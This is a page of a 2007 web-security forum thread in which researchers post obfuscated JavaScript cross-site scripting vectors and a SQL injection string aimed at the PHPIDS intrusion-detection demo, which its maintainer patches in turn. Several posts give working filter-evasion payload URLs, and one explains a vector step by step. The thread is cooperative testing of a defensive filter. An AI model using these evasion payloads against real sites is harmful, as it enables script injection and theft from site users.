Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous123Next
Current Page: 2 of 3
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 05, 2007 02:59AM

@Kishor: We definitely should think about a way to persist the gathered knowledge in a more usable and comprehensive way. Let's chat about this topic the next days please!

@all: Awesome vectors again - I'm starting to repeat myself ;) I am just fixing the issues...

Please consider reading the last group post about the future of the PHPIDS - I am very interested in what you guys think about this current arms race.

http://groups.google.de/group/php-ids/msg/b4008196f38bcb15

Greetings,
.mario

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: sirdarckcat
Date: July 05, 2007 03:39AM

.mario: your response time is amazing! :D, you fix the issues really fast :P

The link you give is just for your reply, the hole thread is:
http://groups.google.de/group/php-ids/browse_thread/thread/f689a9c8cc934867/9a59ea6557f36bd0#9a59ea6557f36bd0
I'll post there my opinion :)

New javascript vector:
http://demo.php-ids.org/?test=a%3D0%7C%7Ceval%7C%7C0%3Bb%3D0%7C%7Cunescape%7C%7C0%3Ba%28b%28location%29%29#%0d%0aalert%28%22xss%22%29%3B

Flaw in SQL detection (why just uppercase?):
http://demo.php-ids.org/?test=%27%20or%20%27%27%3D%27

Greetz!!



Edited 1 time(s). Last edit at 07/05/2007 04:16AM by sirdarckcat.

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 05, 2007 06:37AM

@sirdarckcat:
very nice idea on the full URL broken with newline (just %0A suffices, no need for %0D) :)

If somebody still wonders why it works, it has something to do with my klingon: joke at the beginning of this thread...
http: - parsed as a valid ECMA262 label
//host:port/path/...#...[newline] - C++ style comment opener
yourPayloadHere() - :D
So we can do also
eval(unescape(document.URL))
eval(unescape(document.documentURI))
and if injected in a HTML event handler,
eval(unescape(this.ownerDocument.URL))

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 07/05/2007 06:40AM by ma1.

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 05, 2007 06:48AM

@sirdarckcat: Thx - both issues are fixed. I will enhance the internal converters to deal with the concatenation and linebreak issues this evening.

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 05, 2007 08:24AM

@mario: let us know when it's ready for another round, then ;)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 05, 2007 01:13PM

@ma1: will do for sure ;)

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 05, 2007 03:10PM

@all: Let's dance again - new rules, new converter!

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Martin
Date: July 05, 2007 03:21PM

Was somewhat pleased with:

http://demo.php-ids.org/?test=l=%200%20||%20'str',m=%200%20||%20'sub',x=%200%20||%20'al',y=%200%20||%20'ev',g=%200%20||%20'tion.h',f=%200%20||%20'ash',k=%200%20||%20'loca',d=%20(k)%20%2B%20(g)%20%2B%20(f),a=0%20||%20(y)%20%2B%20(x),b=1[a](d),c=0%20||%20(m)%20%2B%20(l),1[a](b[c](1));#alert(1)

:)

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: sirdarckcat
Date: July 06, 2007 12:18AM

Hi

very good, this was a little harder :P
http://demo.php-ids.org/?test=_%3Deval%2C__%3Dunescape%2C___%3Dlocation%2C_%28__%28___%29%29#%0aalert(%22xss%22%29

Greetz!!



Edited 1 time(s). Last edit at 07/06/2007 12:19AM by sirdarckcat.

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Martin
Date: July 06, 2007 01:52AM

Awesome use of _ as variable names - v. cool indeed!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 06, 2007 04:28AM

Martin Wrote:
-------------------------------------------------------
> Awesome use of _ as variable names

On the contrary, I'm quite surprised that underscore was not already recognized as a valid identifier character: /\w/ matches it (as a word letter), and it's valid in many programming languages.

JS can actually use slightly more exotic identifiers, but I'll keep them for later ;)

In the meanwhile, now you catch "location" (in latest sirdarckcat vector), but looks like someone didn't read carefully my previous post ;)

http://demo.php-ids.org/?test=_=eval,__=unescape,___=document.URL,_(__(___))#%0Aalert(1%29

Oh, the madness of enumerating badness ;)

BTW, you know that all through this carousel, I never had to adjust NoScript's Anti-XSS filter for catching anything new?
ATM I'm just optimizing for speed and using the extra wisdom acquired in this thread to release constraints :)
I'm between 0 and 30 millisecs for complex URLs. Have you got any benchmark for (PHP|NET)IDS?

Cheers

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 06, 2007 06:02AM

Fixed - and looking forward for the 'later' ;)

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 06, 2007 07:29AM

sirdarckcat Wrote:
-------------------------------------------------------
> Ronald:
>
> The following chars are in deed, used commonly in
> legal requests:
>
> [
> ]
> +
> =
>
> (+ means space, = is used for GET fields, [] is
> used for multiple choices in a )
>
> :)

> Greetz!!

I said in the query part, like I said no good request query has these in them. That is why I block all these kind of reuqest uri fiddling.

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 06, 2007 07:32AM

.mario Wrote:
-------------------------------------------------------
> @Ronald: Jep - but what about POST?


Most IDS systems detect upon the GET request, because if you can post something it is already too late. Everything posted should be encoded in any case, without exception.

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: thornmaker
Date: July 06, 2007 08:37AM

I wish you wouldn't fix them so fast .mario! I had to create my own vulnerable php page so I could dissect (fully appreciate) some of these new vectors :)

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: sirdarckcat
Date: July 06, 2007 08:45AM

Dont worry thornmaker, here is a newone:

http://demo.php-ids.org/?test=%281%3Feval%3A0%29%281%3F%281%3Feval%3A0%29%280%3F1%3A%27unesca%27%2B%281%3F%27pe%27%3A0%29%2B%280%3F1%3A%27%28loca%27%2B%281%3F%27tion%29%27%3A0%29%29%29%3A0%29#%0aalert%28%22xss%22%29;

:P greetz!!

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: thornmaker
Date: July 06, 2007 09:09AM

thanks sirdarckcat :) I got that one before .mario did! and quite a clever one too

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 06, 2007 09:26AM

@ma1: Fixed

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: kishord
Date: July 06, 2007 12:43PM


Kishor Was Here!


Hmmm, looks like once you are inside script tag, you rule the world!

Web Application Security Journ(ey)al

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: sirdarckcat
Date: July 06, 2007 01:18PM

Interesting, RegExp.source :P

here is an incomplete vector, I didn't had time to implement into the "location" way..

http://demo.php-ids.org/?test=___%3D1%3F%27ert%28123%29%27%3A0%2C_%3D1%3F%27al%27%3A0%2C__%3D1%3F%27ev%27%3A0%2C1%5B__%2B_%5D%28_%2B___%29

anyway it shows an alert :P

Greetz!!

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 06, 2007 03:34PM

kishord Wrote:
-------------------------------------------------------
> > Kishor Was Here!
>
> Hmmm, looks like once you are inside script tag,
> you rule the world!

Oh yeah!


Disclaimer & credits: original disclosure and flattering proof of concept courtesy of elio
Warning: if you use NoScript, you'll need to allow a ton of assorted junk, included google analytics: the first ad-sponsored XSS? :D


--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 06, 2007 03:40PM

This is exactly what I meant:
http://demo.php-ids.org/?test=___%3D1%3F%27ert%28123%29%27%3A0%2C_%3D1%3F%27al%27%3A0%2C__%3D1%3F%27ev%27%3A0%2C1%5B__%2B_%5D%28_%2B___%29

This will never happen in a legitimate query and thereby this can be detected very quickly with all combinations of: ( = , ' " : ( ) [ ])

I personally never saw a queries like this, did you?

index.php?id=' // illegal
index.php?id=f=b // illegal
index.php?id=( // illegal
index.php?id=< // illegal
index.php?id=> // illegal
index.php?id=^ // illegal
index.php?id=& // illegal
index.php?id=$ // illegal
index.php?id=~ // illegal
index.php?id=` // illegal

Know why? because they are unsafe chars and should be detected in the first IDS round, because they are used to pentest a system first in order to refine the injection later.

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 06, 2007 04:04PM

Ronald Wrote:
-------------------------------------------------------
> This is exactly what I meant:
> http://demo.php-ids.org/?test=___%3D1%3F%27ert%281
> 23%29%27%3A0%2C_%3D1%3F%27al%27%3A0%2C__%3D1%3F%27
> ev%27%3A0%2C1%5B__%2B_%5D%28_%2B___%29
>
> This will never happen in a legitimate query and
> thereby this can be detected very quickly with all
> combinations of: ( = , ' " : ( ) [ ])
>
> I personally never saw a queries like this, did
> you?

I can't see anything illegal in that query, it's all urlencoded:
test=___%3D1%3F%27ert%28123%29%27%3A0%2C_%3D1%3F%27al%27%3A0%2C__%3D1%3F%27ev%27%3A0%2C1%5B__%2B_%5D%28_%2B___%29

BTW, if I was an admin of this board, I would obviously see a lot of legitimate HTTP requests like that, especially in the traffic related to the "So it begins" thread.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 06, 2007 04:31PM

@all: nice ones again... and fixed :)

@Kishord: Wow. I'm speechless. What is that?

@Ronald: I agree when talking about GET Requests. Maybe we should consider doing a before-filter validation when the request type is GET to add initial impact when spiced with illegal characters.

Grx
.mario

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 06, 2007 04:50PM

.mario Wrote:
-------------------------------------------------------
> @Ronald: I agree when talking about GET Requests.

So these are all illegal, right?

http://en.wikipedia.org/wiki/Heroes_(TV_series%29

http://kb.mozillazine.org/Label%3D%22%26blockImageCmd._label%3B%22

http://developer.mozilla.org/en/docs/Core_JavaScript_1.5_Reference:Global_Functions:eval

And I didn't even add any query string :)

As for the tilde character, ~, maybe you're too young to remember the time when most of the web URLs contained one (especially in .edu sites), because it's an Unix shortcut for user's home.

Finally, ?param=& is quite common and legal, since it's sent every time an optional field is left empty in a form.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 07/06/2007 05:17PM by ma1.

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 06, 2007 05:10PM

http://www.ietf.org/rfc/rfc1738.txt
http://www.ietf.org/rfc/rfc1808.txt
http://gbiv.com/protocols/uri/rfc/rfc3986.html#collected-abnf

K - I agree.

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: kishord
Date: July 07, 2007 01:25AM

@Mario

Hi, Here is an explanation of the vector:

evil=/ev/.source+/al/.source
//---variable evil now contains string 'eval'

changeProto=/Strin/.source+
/g.prototyp/.source+
/e.ss=/.source+
/Strin/.source+
/g.prototyp/.source+
/e.substrin/.source+
/g/.source;

//--- changeProto now contains string 'String.prototype.ss=String.prototype.substring'
// Thus now ss is same as substring for any string


hashCod=/documen/.source+
/t.locatio/.source+
/n.has/.source+
/h/.source;

// hashCod now contains string 'document.location.hash'

7[evil](changeProto);
// In turn, the statement above executes eval(changeProto)

hash=7[evil](hashCod);

// In turn, the statement above executes hash=eval(hashCod)
// Thus hashCod now holds a string "#alert('Kishor Was Here!')"

cod=hash.ss(1);

// Since we added ss to String class, cod becomes = "alert('Kishor Was Here!')"

7[evil](cod);
// We use the eval to evaluate cod


In the link of the POC I needed to rename several things e.g. hash to hsh


Hope it was simple ;)

@Mario
When you write all this up, consider using word 'JavasCrypt' in the title
if it doesn't sound like a bad idea.

Web Application Security Journ(ey)al

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 07, 2007 04:04AM

@Kishord: Thanks for the explanation - JavaSCrypt matches the properties of that vector ;) I was also thinking about 'The new dawn of filter evasion' :D

Greetings,
.mario

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 07, 2007 04:45AM

http://demo.php-ids.org/?test=%24%3Ddocument%2C%24%3D%24.URL%2C%24%24%3Dunescape%2C%24%24%24%3Deval%2C%24%24%24%28%24%24%28%24%29%29#%0Aalert%28%27$$$%20PECUNIA%20NON%20OLET%20$$$%27%29

... && JavasCrypt.votes++ //:)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: sirdarckcat
Date: July 07, 2007 08:29AM

Hi!

Today I'll introduce the use of XML Predicates in JavaScript to the
vectors.

I was trying to leave this to the end, but..

http://demo.php-ids.org/?test=y%3D%3Ca%3Ealert%3C/a%20%3E%3Bcontent%5By%5D%28123%29

The code:
y=<a>alert</a >;content[y](123)

The XML Predicate:
y=<a>alert</a >;

I'm running out of ideas :P, this filter is a pretty hard obstacle to
any attacker, congratulations mario :D

Greetz!!

PS. content=window
JavasCrypt rulz :P



Edited 1 time(s). Last edit at 07/07/2007 08:32AM by sirdarckcat.

Options: ReplyQuote
Pages: Previous123Next
Current Page: 2 of 3


Sorry, only registered users may post in this forum.